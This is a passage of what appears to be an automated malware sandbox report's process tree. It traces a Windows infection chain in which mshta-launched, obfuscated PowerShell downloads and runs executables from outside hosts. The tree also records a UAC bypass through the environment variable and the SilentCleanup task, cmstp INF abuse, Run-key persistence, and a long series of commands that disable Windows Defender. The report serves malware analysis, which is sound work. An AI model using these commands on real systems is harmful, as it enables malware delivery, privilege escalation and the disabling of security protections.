PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
PID:4800
-
-
C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"C:\Users\Admin\AppData\Local\Temp\xoEEhQ7GLT.exe"8⤵
- Executes dropped EXE
PID:4604
-
-
-
C:\Users\Admin\AppData\Local\Temp\Yms5gMrn3A.exe"C:\Users\Admin\AppData\Local\Temp\Yms5gMrn3A.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:2140 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵PID:5916
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\kNhjQtso.bat" "9⤵PID:2084
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
PID:1868
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
PID:4760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵PID:4884
-
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\kNhjQtso.bat" "9⤵PID:5384
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:5140
-
-
-
C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4724 -
C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"C:\Users\Admin\AppData\Local\Temp\0X6NfiXLW1.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4836 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\joazwkiz.inf9⤵PID:4728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4684 -
C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"C:\Users\Admin\AppData\Local\Temp\Yk4BLKNa1Z.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:5036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4144
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\pnc.exe"7⤵PID:4980
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:4812
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:2976
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Users\Public\ldz.exe"C:\Users\Public\ldz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5740 -
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5968 -
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5152 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5152 & erase C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe & RD /S /Q C:\\ProgramData\\248482891706359\\* & exit9⤵PID:3276
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 515210⤵
- Kills process with taskkill
PID:6032
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"{path}"7⤵
- Executes dropped EXE
PID:4600
-
-
-
C:\Users\Public\ldz.exe"{path}"6⤵
- Executes dropped EXE
PID:5752
-
-
C:\Users\Public\ldz.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"C:\Users\Admin\AppData\Local\Temp\HXkNYAi4c4.exe"8⤵
- Executes dropped EXE
PID:3928
-
-
-
C:\Users\Admin\AppData\Local\Temp\v15Xka8Ssx.exe"C:\Users\Admin\AppData\Local\Temp\v15Xka8Ssx.exe"7⤵
- Executes dropped EXE
PID:4404 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵PID:4304
-
-
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6000 -
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"8⤵
- Executes dropped EXE
PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"C:\Users\Admin\AppData\Local\Temp\jkgBQhmV6k.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3880 -
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xxs1lihx.inf9⤵PID:4368
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"C:\Users\Admin\AppData\Local\Temp\AswoNvyLvJ.exe"8⤵
- Executes dropped EXE
- Windows security modification
PID:2640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵PID:4256
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ldz.exe"7⤵PID:4656
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
PID:2732
-
-
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
PID:3768
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480 -
C:\Users\Public\adv.exe"C:\Users\Public\adv.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2076
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\797B.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵PID:4648
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\s4drbjpj.exe2⤵PID:5096
-
C:\Windows\temp\s4drbjpj.exeC:\Windows\temp\s4drbjpj.exe3⤵
- Executes dropped EXE
PID:696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\tmnj3xnh.exe2⤵PID:4756
-
C:\Windows\temp\tmnj3xnh.exeC:\Windows\temp\tmnj3xnh.exe3⤵
- Executes dropped EXE
PID:4432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵PID:5192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵PID:5456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵PID:4244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵PID:5228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵PID:5044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵PID:3836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force4⤵PID:3352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 64⤵PID:6060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 04⤵PID:5048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 64⤵PID:4528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 64⤵PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true4⤵PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 24⤵PID:800
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cmstp.exe /F2⤵
- Kills process with taskkill
PID:5176
-